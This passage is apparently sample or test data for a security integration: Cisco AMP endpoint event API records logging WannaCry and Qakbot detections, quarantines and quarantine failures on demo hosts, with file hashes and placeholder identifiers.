Failure","event_type_id":2164260880,"detection_id":"6419214500913741861","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741860","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741861","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":350000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741860","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":225000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":210000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":194000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":178000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":163000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214492323807000,"timestamp":1610631810,"timestamp_nanoseconds":447000000,"date":"2021-01-14T13:43:30+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214488028840000,"timestamp":1610631809,"timestamp_nanoseconds":916000000,"date":"2021-01-14T13:43:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945890085425,"timestamp":1610630976,"timestamp_nanoseconds":535214029,"date":"2021-01-14T13:29:36+00:00","event_type":"Potential Dropper Infection","event_type_id":1107296257,"detection":"W32.Variant:Gen.20gl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610630976,"start_date":"2021-01-14T13:29:36+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412574627503014000,"timestamp":1610630889,"timestamp_nanoseconds":341000000,"date":"2021-01-14T13:28:09+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":612000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":565000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769884","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":206000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769883","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":128000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769882","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":50000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":596000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat 